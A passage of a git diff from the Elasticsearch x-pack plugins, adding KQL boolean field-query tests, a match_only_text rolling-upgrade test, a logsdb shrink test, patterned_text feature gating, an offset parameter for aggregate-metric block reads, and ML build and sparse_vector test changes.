526ae94d6ac88..3a6fbc8b67ab3 100644 --- a/x-pack/plugin/kql/src/test/resources/unsupported-queries +++ b/x-pack/plugin/kql/src/test/resources/unsupported-queries @@ -41,8 +41,6 @@ mapped_nested: { mapped_string:foo OR (mapped_string_2:foo bar OR foo bar) } // Missing escape sequences: mapped_string: foo:bar -mapped_string: (foo and bar) -mapped_string: (foo or bar) mapped_string: foo not bar mapped_string: foo { bar } mapped_string: foo (bar) diff --git a/x-pack/plugin/kql/src/yamlRestTest/resources/rest-api-spec/test/kql/10_kql_basic_query.yml b/x-pack/plugin/kql/src/yamlRestTest/resources/rest-api-spec/test/kql/10_kql_basic_query.yml index bb59c6a48b612..d4dc483796be5 100644 --- a/x-pack/plugin/kql/src/yamlRestTest/resources/rest-api-spec/test/kql/10_kql_basic_query.yml +++ b/x-pack/plugin/kql/src/yamlRestTest/resources/rest-api-spec/test/kql/10_kql_basic_query.yml @@ -47,7 +47,7 @@ setup: } - match: { hits.total: 2 } - # Using the *:* syntax + # Using the *: syntax - do: search: index: test-index @@ -58,7 +58,7 @@ setup: } - match: { hits.total: 2 } - # Using the *:* syntax + # Using the *: syntax - do: search: index: test-index @@ -210,3 +210,65 @@ setup: - match: { hits.total: 1 } - match: { hits.hits.0._id: "doc-1" } + +--- +"KQL boolean expressions withing field queries": + - requires: + capabilities: + - method: POST + path: /_search + capabilities: [ kql_query_boolean_field_query ] + test_runner_features: capabilities + reason: Support for boolean expression within field query is not available. + + - do: + search: + index: test-index + rest_total_hits_as_int: true + body: > + { + "query": { "kql": { "query": "text_field:(foo AND bar)" } } + } + - match: { hits.total: 1 } + - match: { hits.hits.0._id: "doc-1" } + + - do: + search: + index: test-index + rest_total_hits_as_int: true + body: > + { + "query": { "kql": { "query": "text_field:(bar OR baz)" } } + } + - match: { hits.total: 2 } + + - do: + search: + index: test-index + rest_total_hits_as_int: true + body: > + { + "query": { "kql": { "query": "text_field:(foo AND NOT baz)" } } + } + - match: { hits.total: 1 } + - match: { hits.hits.0._id: "doc-1" } + + - do: + search: + index: test-index + rest_total_hits_as_int: true + body: > + { + "query": { "kql": { "query": "keyword_field:(\"foo bar\" OR \"foo baz\")" } } + } + - match: { hits.total: 2 } + + - do: + search: + index: test-index + rest_total_hits_as_int: true + body: > + { + "query": { "kql": { "query": "keyword_field:(\"foo bar\" AND \"foo baz\")" } } + } + - match: { hits.total: 0 } diff --git a/x-pack/plugin/logsdb/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/MatchOnlyTextRollingUpgradeIT.java b/x-pack/plugin/logsdb/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/MatchOnlyTextRollingUpgradeIT.java new file mode 100644 index 0000000000000..80a77d76ea162 --- /dev/null +++ b/x-pack/plugin/logsdb/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/MatchOnlyTextRollingUpgradeIT.java @@ -0,0 +1,252 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.upgrades; + +import com.carrotsearch.randomizedtesting.annotations.Name; + +import org.elasticsearch.client.Request; +import org.elasticsearch.client.Response; +import org.elasticsearch.client.ResponseException; +import org.elasticsearch.common.network.NetworkAddress; +import org.elasticsearch.common.time.DateFormatter; +import org.elasticsearch.common.time.FormatNames; +import org.elasticsearch.common.xcontent.XContentHelper; +import org.elasticsearch.test.rest.ObjectPath; +import org.elasticsearch.xcontent.XContentType; + +import java.io.IOException; +import java.io.InputStream; +import java.time.Instant; +import java.util.List; +import java.util.Locale; +import java.util.Map; + +import static org.elasticsearch.upgrades.LogsIndexModeRollingUpgradeIT.enableLogsdbByDefault; +import static org.elasticsearch.upgrades.LogsIndexModeRollingUpgradeIT.getWriteBackingIndex; +import static org.hamcrest.Matchers.containsString; +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.greaterThanOrEqualTo; +import static org.hamcrest.Matchers.notNullValue; + +public class MatchOnlyTextRollingUpgradeIT extends AbstractRollingUpgradeWithSecurityTestCase { + + static String BULK_ITEM_TEMPLATE = + """ + {"@timestamp": "$now", "host.name": "$host", "method": "$method", "ip": "$ip", "message": "$message", "length": $length, "factor": $factor} + """; + + private static final String TEMPLATE = """ + { + "mappings": { + "properties": { + "@timestamp" : { + "type": "date" + }, + "method": { + "type": "keyword" + }, + "message": { + "type": "match_only_text" + }, + "ip": { + "type": "ip" + }, + "length": { + "type": "long" + }, + "factor": { + "type": "double" + } + } + } + }"""; + + public MatchOnlyTextRollingUpgradeIT(@Name("upgradedNodes") int upgradedNodes) { + super(upgradedNodes); + } + + public void testIndexing() throws Exception { + String dataStreamName = "logs-bwc-test"; + if (isOldCluster()) { + startTrial(); + enableLogsdbByDefault(); + createTemplate(dataStreamName, getClass().getSimpleName().toLowerCase(Locale.ROOT), TEMPLATE); + + Instant startTime = Instant.now().minusSeconds(60 * 60); + bulkIndex(dataStreamName, 4, 1024, startTime); + + String firstBackingIndex = getWriteBackingIndex(client(), dataStreamName, 0); + var settings = (Map) getIndexSettingsWithDefaults(firstBackingIndex).get(firstBackingIndex); + assertThat(((Map) settings.get("settings")).get("index.mode"), equalTo("logsdb")); + assertThat(((Map) settings.get("defaults")).get("index.mapping.source.mode"), equalTo("SYNTHETIC")); + + ensureGreen(dataStreamName); + search(dataStreamName); + query(dataStreamName); + } else if (isMixedCluster()) { + Instant startTime = Instant.now().minusSeconds(60 * 30); + bulkIndex(dataStreamName, 4, 1024, startTime); + + ensureGreen(dataStreamName); + search(dataStreamName); + query(dataStreamName); + } else if (isUpgradedCluster()) { + ensureGreen(dataStreamName); + Instant startTime = Instant.now(); + bulkIndex(dataStreamName, 4, 1024, startTime); + search(dataStreamName); + query(dataStreamName); + + var forceMergeRequest = new Request("POST", "/" + dataStreamName + "/_forcemerge"); + forceMergeRequest.addParameter("max_num_segments", "1"); + assertOK(client().performRequest(forceMergeRequest)); + + ensureGreen(dataStreamName); + search(dataStreamName); + query(dataStreamName); + } + } + + static void createTemplate(String dataStreamName, String id, String template) throws IOException { + final String INDEX_TEMPLATE = """ + { + "index_patterns": ["$DATASTREAM"], + "template": $TEMPLATE, + "data_stream": { + } + }"""; + var putIndexTemplateRequest = new Request("POST", "/_index_template/" + id); + putIndexTemplateRequest.setJsonEntity(INDEX_TEMPLATE.replace("$TEMPLATE", template).replace("$DATASTREAM", dataStreamName)); + assertOK(client().performRequest(putIndexTemplateRequest)); + } + + static String bulkIndex(String dataStreamName, int numRequest, int numDocs, Instant startTime) throws Exception { + String firstIndex = null; + for (int i = 0; i < numRequest; i++) { + var bulkRequest = new Request("POST", "/" + dataStreamName + "/_bulk"); + StringBuilder requestBody = new StringBuilder(); + for (int j = 0; j < numDocs; j++) { + String hostName = "host" + j % 50; // Not realistic, but makes asserting search / query response easier. + String methodName = "method" + j % 5; + String ip = NetworkAddress.format(randomIp(true)); + String param = "chicken" + randomInt(5); + String message = "the quick brown fox jumps over the " + param; + long length = randomLong(); + double factor = randomDouble(); + + requestBody.append("{\"create\": {}}"); + requestBody.append('\n'); + requestBody.append( + BULK_ITEM_TEMPLATE.replace("$now", formatInstant(startTime)) + .replace("$host", hostName) + .replace("$method", methodName) + .replace("$ip", ip) + .replace("$message", message) + .replace("$length", Long.toString(length)) + .replace("$factor", Double.toString(factor)) + ); + requestBody.append('\n'); + + startTime = startTime.plusMillis(1); + } + bulkRequest.setJsonEntity(requestBody.toString()); + bulkRequest.addParameter("refresh", "true"); + var response = client().performRequest(bulkRequest); + assertOK(response); + var responseBody = entityAsMap(response); + assertThat("errors in response:\n " + responseBody, responseBody.get("errors"), equalTo(false)); + if (firstIndex == null) { + firstIndex = (String) ((Map) ((Map) ((List) responseBody.get("items")).get(0)).get("create")).get("_index"); + } + } + return firstIndex; + } + + void search(String dataStreamName) throws Exception { + var searchRequest = new Request("POST", "/" + dataStreamName + "/_search"); + searchRequest.addParameter("pretty", "true"); + searchRequest.setJsonEntity(""" + { + "size": 500, + "query": { + "match_phrase": { + "message": "chicken" + } + } + } + """.replace("chicken", "chicken" + randomInt(5))); + var response = client().performRequest(searchRequest); + assertOK(response); + var responseBody = entityAsMap(response); + logger.info("{}", responseBody); + + Integer totalCount = ObjectPath.evaluate(responseBody, "hits.total.value"); + assertThat(totalCount, greaterThanOrEqualTo(512)); + } + + void query(String dataStreamName) throws Exception { + var queryRequest = new Request("POST", "/_query"); + queryRequest.addParameter("pretty", "true"); + queryRequest.setJsonEntity(""" + { + "query": "FROM $ds | STATS max(length), max(factor) BY message | SORT message | LIMIT 5" + } + """.replace("$ds", dataStreamName)); + var response = client().performRequest(queryRequest); + assertOK(response); + var responseBody = entityAsMap(response); + logger.info("{}", responseBody); + + String column1 = ObjectPath.evaluate(responseBody, "columns.0.name"); + String column2 = ObjectPath.evaluate(responseBody, "columns.1.name"); + String column3 = ObjectPath.evaluate(responseBody, "columns.2.name"); + assertThat(column1, equalTo("max(length)")); + assertThat(column2, equalTo("max(factor)")); + assertThat(column3, equalTo("message")); + + String key = ObjectPath.evaluate(responseBody, "values.0.2"); + assertThat(key, equalTo("the quick brown fox jumps over the chicken0")); + Long maxRx = ObjectPath.evaluate(responseBody, "values.0.0"); + assertThat(maxRx, notNullValue()); + Double maxTx = ObjectPath.evaluate(responseBody, "values.0.1"); + assertThat(maxTx, notNullValue()); + } + + protected static void startTrial() throws IOException { + Request startTrial = new Request("POST", "/_license/start_trial"); + startTrial.addParameter("acknowledge", "true"); + try { + assertOK(client().performRequest(startTrial)); + } catch (ResponseException e) { + var responseBody = entityAsMap(e.getResponse()); + String error = ObjectPath.evaluate(responseBody, "error_message"); + assertThat(error, containsString("Trial was already activated.")); + } + } + + static Map getIndexSettingsWithDefaults(String index) throws IOException { + Request request = new Request("GET", "/" + index + "/_settings"); + request.addParameter("flat_settings", "true"); + request.addParameter("include_defaults", "true"); + Response response = client().performRequest(request); + try (InputStream is = response.getEntity().getContent()) { + return XContentHelper.convertToMap( + XContentType.fromMediaType(response.getEntity().getContentType().getValue()).xContent(), + is, + true + ); + } + } + + static String formatInstant(Instant instant) { + return DateFormatter.forPattern(FormatNames.STRICT_DATE_OPTIONAL_TIME.getName()).format(instant); + } + +} diff --git a/x-pack/plugin/logsdb/src/internalClusterTest/java/org/elasticsearch/xpack/logsdb/LogsIndexingIT.java b/x-pack/plugin/logsdb/src/internalClusterTest/java/org/elasticsearch/xpack/logsdb/LogsIndexingIT.java index 82c8d9f5243d5..bea3b7343de3b 100644 --- a/x-pack/plugin/logsdb/src/internalClusterTest/java/org/elasticsearch/xpack/logsdb/LogsIndexingIT.java +++ b/x-pack/plugin/logsdb/src/internalClusterTest/java/org/elasticsearch/xpack/logsdb/LogsIndexingIT.java @@ -11,11 +11,13 @@ import org.elasticsearch.action.admin.indices.refresh.RefreshRequest; import org.elasticsearch.action.admin.indices.settings.get.GetSettingsRequest; import org.elasticsearch.action.admin.indices.settings.get.GetSettingsResponse; +import org.elasticsearch.action.admin.indices.shrink.ResizeType; import org.elasticsearch.action.admin.indices.template.put.TransportPutComposableIndexTemplateAction; import org.elasticsearch.action.bulk.BulkRequest; import org.elasticsearch.action.get.GetRequest; import org.elasticsearch.action.index.IndexRequest; import org.elasticsearch.action.search.SearchRequest; +import org.elasticsearch.action.support.WriteRequest; import org.elasticsearch.cluster.metadata.ComposableIndexTemplate; import org.elasticsearch.cluster.metadata.Template; import org.elasticsearch.common.compress.CompressedXContent; @@ -35,6 +37,8 @@ import java.util.List; import java.util.UUID; +import static org.elasticsearch.index.mapper.DateFieldMapper.DEFAULT_DATE_TIME_FORMATTER; +import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertNoFailures; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertResponse; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.is; @@ -206,6 +210,38 @@ private void checkIndexSearchAndRetrieval(String dataStreamName, boolean routeOn }); } + public void testShrink() throws Exception { + client().admin() + .indices() + .prepareCreate("my-logs") + .setMapping("@timestamp", "type=date", "host.name", "type=keyword") + .setSettings(indexSettings(between(3, 5), 0).put("index.mode", "logsdb").put("index.sort.field", "host.name")) + .get(); + + long timestamp = DEFAULT_DATE_TIME_FORMATTER.parseMillis("2025-08-08T00:00:00Z"); + BulkRequest bulkRequest = new BulkRequest("my-logs"); + int numDocs = randomIntBetween(100, 10_000); + for (int i = 0; i < numDocs; i++) { + timestamp += randomIntBetween(0, 1000); + String field = "field-" + randomIntBetween(1, 20); + bulkRequest.add( + new IndexRequest("my-logs").id(Integer.toString(i)) + .source("host.name", "host-" + between(1, 5), "@timestamp", timestamp, field, randomNonNegativeLong()) + ); + } + bulkRequest.setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + client().bulk(bulkRequest).actionGet(); + client().admin().indices().prepareFlush("my-logs").get(); + client().admin().indices().prepareUpdateSettings("my-logs").setSettings(Settings.builder().put("index.blocks.write", true)).get(); + client().admin() + .indices() + .prepareResizeIndex("my-logs", "shrink-my-logs") + .setResizeType(ResizeType.SHRINK) + .setSettings(indexSettings(1, 0).build()) + .get(); + assertNoFailures(client().admin().indices().prepareForceMerge("shrink-my-logs").setMaxNumSegments(1).setFlush(true).get()); + } + static String formatInstant(Instant instant) { return DateFormatter.forPattern(FormatNames.STRICT_DATE_OPTIONAL_TIME.getName()).format(instant); } diff --git a/x-pack/plugin/logsdb/src/javaRestTest/java/org/elasticsearch/xpack/logsdb/qa/StandardVersusLogsIndexModeChallengeRestIT.java b/x-pack/plugin/logsdb/src/javaRestTest/java/org/elasticsearch/xpack/logsdb/qa/StandardVersusLogsIndexModeChallengeRestIT.java index 737fe5693215a..c9a25764002cd 100644 --- a/x-pack/plugin/logsdb/src/javaRestTest/java/org/elasticsearch/xpack/logsdb/qa/StandardVersusLogsIndexModeChallengeRestIT.java +++ b/x-pack/plugin/logsdb/src/javaRestTest/java/org/elasticsearch/xpack/logsdb/qa/StandardVersusLogsIndexModeChallengeRestIT.java @@ -55,7 +55,7 @@ public abstract class StandardVersusLogsIndexModeChallengeRestIT extends Abstrac protected final DataGenerationHelper dataGenerationHelper; public StandardVersusLogsIndexModeChallengeRestIT() { - this(new DataGenerationHelper()); + this(new DataGenerationHelper(builder -> builder.withMaxFieldCountPerLevel(30))); } protected StandardVersusLogsIndexModeChallengeRestIT(DataGenerationHelper dataGenerationHelper) { diff --git a/x-pack/plugin/logsdb/src/test/java/org/elasticsearch/xpack/logsdb/patternedtext/PatternedTextFieldMapperTests.java b/x-pack/plugin/logsdb/src/test/java/org/elasticsearch/xpack/logsdb/patternedtext/PatternedTextFieldMapperTests.java index 2a707eafa285d..9b572e171bd96 100644 --- a/x-pack/plugin/logsdb/src/test/java/org/elasticsearch/xpack/logsdb/patternedtext/PatternedTextFieldMapperTests.java +++ b/x-pack/plugin/logsdb/src/test/java/org/elasticsearch/xpack/logsdb/patternedtext/PatternedTextFieldMapperTests.java @@ -40,6 +40,7 @@ import org.elasticsearch.xcontent.XContentFactory; import org.elasticsearch.xpack.logsdb.LogsDBPlugin; import org.junit.AssumptionViolatedException; +import org.junit.Before; import java.io.IOException; import java.util.Collection; @@ -72,6 +73,11 @@ protected void assertExistsQuery(MappedFieldType fieldType, Query query, LuceneD assertNoFieldNamesField(fields); } + @Before + public void setup() { + assumeTrue("Only when patterned_text feature flag is enabled", PatternedTextFieldMapper.PATTERNED_TEXT_MAPPER.isEnabled()); + } + public void testExistsStandardSource() throws IOException { assertExistsQuery(createMapperService(fieldMapping(b -> b.field("type", "patterned_text")))); } diff --git a/x-pack/plugin/logsdb/src/yamlRestTest/java/org/elasticsearch/xpack/logsdb/LogsdbTestSuiteIT.java b/x-pack/plugin/logsdb/src/yamlRestTest/java/org/elasticsearch/xpack/logsdb/LogsdbTestSuiteIT.java index acb146d2af542..72ba813055083 100644 --- a/x-pack/plugin/logsdb/src/yamlRestTest/java/org/elasticsearch/xpack/logsdb/LogsdbTestSuiteIT.java +++ b/x-pack/plugin/logsdb/src/yamlRestTest/java/org/elasticsearch/xpack/logsdb/LogsdbTestSuiteIT.java @@ -10,6 +10,7 @@ import com.carrotsearch.randomizedtesting.annotations.Name; import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; +import org.elasticsearch.Build; import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.util.concurrent.ThreadContext; @@ -20,6 +21,9 @@ import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; import org.junit.ClassRule; +import java.util.ArrayList; +import java.util.List; + public class LogsdbTestSuiteIT extends ESClientYamlSuiteTestCase { private static final String USER = "test_admin"; @@ -34,6 +38,7 @@ public class LogsdbTestSuiteIT extends ESClientYamlSuiteTestCase { .setting("xpack.license.self_generated.type", "trial") .feature(FeatureFlag.DOC_VALUES_SKIPPER) .feature(FeatureFlag.USE_LUCENE101_POSTINGS_FORMAT) + .feature(FeatureFlag.PATTERNED_TEXT) .build(); public LogsdbTestSuiteIT(@Name("yaml") ClientYamlTestCandidate testCandidate) { @@ -42,7 +47,19 @@ public LogsdbTestSuiteIT(@Name("yaml") ClientYamlTestCandidate testCandidate) { @ParametersFactory public static Iterable parameters() throws Exception { - return ESClientYamlSuiteTestCase.createParameters(); + // Filter out 52_esql_insist_operator_synthetic_source.yml suite for snapshot builds: + // (esql doesn't use feature flags and all experimental features are just enabled if build is snapshot) + + List filtered = new ArrayList<>(); + for (Object[] params : ESClientYamlSuiteTestCase.createParameters()) { + ClientYamlTestCandidate candidate = (ClientYamlTestCandidate) params[0]; + if (candidate.getRestTestSuite().getName().equals("52_esql_insist_operator_synthetic_source") + && Build.current().isSnapshot() == false) { + continue; + } + filtered.add(new Object[] { candidate }); + } + return filtered; } @Override diff --git a/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/10_basic.yml b/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/10_basic.yml index e25a2d2e76a76..ba462b9db8ab7 100644 --- a/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/10_basic.yml +++ b/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/10_basic.yml @@ -1,4 +1,7 @@ setup: + - requires: + cluster_features: [ "mapper.patterned_text" ] + reason: "patterned_text mappings are used in this test" - do: indices.create: diff --git a/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/20_synthetic_source.yml b/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/20_synthetic_source.yml index a21ee18ac6424..67f2de4b31332 100644 --- a/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/20_synthetic_source.yml +++ b/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/20_synthetic_source.yml @@ -1,3 +1,9 @@ +setup: + - requires: + cluster_features: [ "mapper.patterned_text" ] + reason: "patterned_text mappings are used in this test" + +--- simple: - do: indices.create: diff --git a/x-pack/plugin/mapper-aggregate-metric/src/main/java/org/elasticsearch/xpack/aggregatemetric/mapper/AggregateMetricDoubleFieldMapper.java b/x-pack/plugin/mapper-aggregate-metric/src/main/java/org/elasticsearch/xpack/aggregatemetric/mapper/AggregateMetricDoubleFieldMapper.java index 5eafb858eacbe..3658313642700 100644 --- a/x-pack/plugin/mapper-aggregate-metric/src/main/java/org/elasticsearch/xpack/aggregatemetric/mapper/AggregateMetricDoubleFieldMapper.java +++ b/x-pack/plugin/mapper-aggregate-metric/src/main/java/org/elasticsearch/xpack/aggregatemetric/mapper/AggregateMetricDoubleFieldMapper.java @@ -571,20 +571,24 @@ public String toString() { } @Override - public Block read(BlockFactory factory, Docs docs) throws IOException { - try (var builder = factory.aggregateMetricDoubleBuilder(docs.count())) { - copyDoubleValuesToBuilder(docs, builder.min(), minValues); - copyDoubleValuesToBuilder(docs, builder.max(), maxValues); - copyDoubleValuesToBuilder(docs, builder.sum(), sumValues); - copyIntValuesToBuilder(docs, builder.count(), valueCountValues); + public Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (var builder = factory.aggregateMetricDoubleBuilder(docs.count() - offset)) { + copyDoubleValuesToBuilder(docs, offset, builder.min(), minValues); + copyDoubleValuesToBuilder(docs, offset, builder.max(), maxValues); + copyDoubleValuesToBuilder(docs, offset, builder.sum(), sumValues); + copyIntValuesToBuilder(docs, offset, builder.count(), valueCountValues); return builder.build(); } } - private void copyDoubleValuesToBuilder(Docs docs, BlockLoader.DoubleBuilder builder, NumericDocValues values) - throws IOException { + private void copyDoubleValuesToBuilder( + Docs docs, + int offset, + BlockLoader.DoubleBuilder builder, + NumericDocValues values + ) throws IOException { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); @@ -600,10 +604,10 @@ private void copyDoubleValuesToBuilder(Docs docs, BlockLoader.DoubleBuilder buil } } - private void copyIntValuesToBuilder(Docs docs, BlockLoader.IntBuilder builder, NumericDocValues values) + private void copyIntValuesToBuilder(Docs docs, int offset, BlockLoader.IntBuilder builder, NumericDocValues values) throws IOException { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); diff --git a/x-pack/plugin/mapper-constant-keyword/src/main/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapper.java b/x-pack/plugin/mapper-constant-keyword/src/main/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapper.java index 5a667df9ffbbf..2102aaaa72cb6 100644 --- a/x-pack/plugin/mapper-constant-keyword/src/main/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapper.java +++ b/x-pack/plugin/mapper-constant-keyword/src/main/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapper.java @@ -212,6 +212,11 @@ protected boolean matches(String pattern, boolean caseInsensitive, QueryRewriteC return Regex.simpleMatch(pattern, value, caseInsensitive); } + @Override + public String getConstantFieldValue(SearchExecutionContext context) { + return value; + } + @Override public Query existsQuery(SearchExecutionContext context) { return value != null ? new MatchAllDocsQuery() : new MatchNoDocsQuery(); diff --git a/x-pack/plugin/mapper-constant-keyword/src/test/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapperTests.java b/x-pack/plugin/mapper-constant-keyword/src/test/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapperTests.java index c0c2db53b97e9..1a94ca1b8d40a 100644 --- a/x-pack/plugin/mapper-constant-keyword/src/test/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapperTests.java +++ b/x-pack/plugin/mapper-constant-keyword/src/test/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapperTests.java @@ -276,7 +276,7 @@ public FieldNamesFieldMapper.FieldNamesFieldType fieldNames() { iw.close(); try (DirectoryReader reader = DirectoryReader.open(directory)) { TestBlock block = (TestBlock) loader.columnAtATimeReader(reader.leaves().get(0)) - .read(TestBlock.factory(reader.numDocs()), new BlockLoader.Docs() { + .read(TestBlock.factory(), new BlockLoader.Docs() { @Override public int count() { return 1; @@ -286,7 +286,7 @@ public int count() { public int get(int i) { return 0; } - }); + }, 0); assertThat(block.get(0), nullValue()); } } diff --git a/x-pack/plugin/ml/build.gradle b/x-pack/plugin/ml/build.gradle index db87c27d30d21..fd63fe2eabb05 100644 --- a/x-pack/plugin/ml/build.gradle +++ b/x-pack/plugin/ml/build.gradle @@ -51,6 +51,14 @@ esplugin.bundleSpec.from { configurations.nativeBundle.files.collect { zipTree(it) } } +// this is required due to https://github.com/nebula-plugins/gradle-ospackage-plugin/issues/472 +// those lib files should not be executable in the first place +esplugin.bundleSpec.filesMatching("platform/**/lib/*") { details -> + details.permissions { + unix(0644) + } +} + // We don't ship the individual nativeBundle licenses - instead // they get combined into the top level NOTICES file we ship esplugin.bundleSpec.exclude 'platform/licenses/**' @@ -103,9 +111,9 @@ def mlCppVersion(){ (project.version + "-SNAPSHOT") : project.version; } -artifacts { - // normal es plugins do not publish the jar but we need to since users need it for extensions - archives tasks.named("jar") + +tasks.named('assemble').configure { + dependsOn tasks.named('jar') } tasks.register("extractNativeLicenses", Copy) { diff --git a/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/multi_cluster/50_sparse_vector.yml b/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/multi_cluster/50_sparse_vector.yml index c3255467ff443..80e4103045489 100644 --- a/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/multi_cluster/50_sparse_vector.yml +++ b/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/multi_cluster/50_sparse_vector.yml @@ -622,7 +622,7 @@ teardown: {"index": { "_id": "11" }} {"content_embedding":{"is": 0.6, "pugs": 0.6 }} {"index": { "_id": "12" }} - {"content_embedding":{"is": 0.1891394, "pugs": 0.1 }} + {"content_embedding":{"cats": 0.1 }} - do: search: @@ -633,13 +633,25 @@ teardown: field: content_embedding query_vector: pugs: 0.5 - cats: 0.5 - is: 0.04600334 + cats: 0.18 + is: 0.20 - match: { hits.total.value: 2 } - match: { hits.hits.0._id: "11" } - match: { hits.hits.1._id: "12" } + - do: + search: + index: test-sparse-vector-pruning-default + body: + query: + sparse_vector: + field: content_embedding + query_vector: + is: 0.21 # 0.2 is the weight threshold for the default pruning config + + - match: { hits.total.value: 11 } + - do: search: index: test-sparse-vector-pruning-default diff --git a/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/remote_cluster/50_sparse_vector.yml b/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/remote_cluster/50_sparse_vector.yml index 3014883e5b42a..cb789260f4e69 100644 --- a/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/remote_cluster/50_sparse_vector.yml +++ b/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/remote_cluster/50_sparse_vector.yml @@ -620,7 +620,7 @@ teardown: {"index": { "_id": "11" }} {"content_embedding":{"is": 0.6, "pugs": 0.6 }} {"index": { "_id": "12" }} - {"content_embedding":{"is": 0.1891394, "pugs": 0.1 }} + {"content_embedding":{"cats": 0.1 }} - do: search: @@ -631,13 +631,26 @@ teardown: field: content_embedding query_vector: pugs: 0.5 - cats: 0.5 - is: 0.04600334 + cats: 0.18 + is: 0.20 - match: { hits.total.value: 2 } - match: { hits.hits.0._id: "11" } - match: { hits.hits.1._id: "12" } + - do: + search: + index: test-sparse-vector-pruning-default + body: + query: + sparse_vector: + field: content_embedding + query_vector: + is: 0.21 # 0.2 is the weight threshold for the default pruning config + + - match: { hits.total.value: 11 } + + - do: search: index: test-sparse-vector-pruning-default diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlAnomaliesIndexUpdate.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlAnomaliesIndexUpdate.java index 26e0246312e1c..8067fcfde4ab4 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlAnomaliesIndexUpdate.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlAnomaliesIndexUpdate.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchStatusException; import org.elasticsearch.ResourceAlreadyExistsException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.admin.indices.alias.IndicesAliasesRequest; import org.elasticsearch.action.admin.indices.alias.IndicesAliasesRequestBuilder; @@ -41,6 +40,7 @@ import java.util.Arrays; import java.util.List; +import static org.elasticsearch.TransportVersions.ML_ROLLOVER_LEGACY_INDICES; import static org.elasticsearch.xpack.core.ClientHelper.ML_ORIGIN; import static org.elasticsearch.xpack.core.ml.utils.MlIndexAndAlias.FIRST_INDEX_SIX_DIGIT_SUFFIX; import static org.elasticsearch.xpack.core.ml.utils.MlIndexAndAlias.has6DigitSuffix; @@ -65,7 +65,7 @@ public MlAnomaliesIndexUpdate(IndexNameExpressionResolver expressionResolver, Cl public boolean isMinTransportVersionSupported(TransportVersion minTransportVersion) { // Automatic rollover does not require any new features // but wait for all nodes to be upgraded anyway - return minTransportVersion.onOrAfter(TransportVersions.ML_ROLLOVER_LEGACY_INDICES); + return minTransportVersion.onOrAfter(ML_ROLLOVER_LEGACY_INDICES); } @Override diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlIndexRollover.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlIndexRollover.java index 05eefe174dbab..e5613a6155294 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlIndexRollover.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlIndexRollover.java @@ -10,7 +10,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.ElasticsearchStatusException; 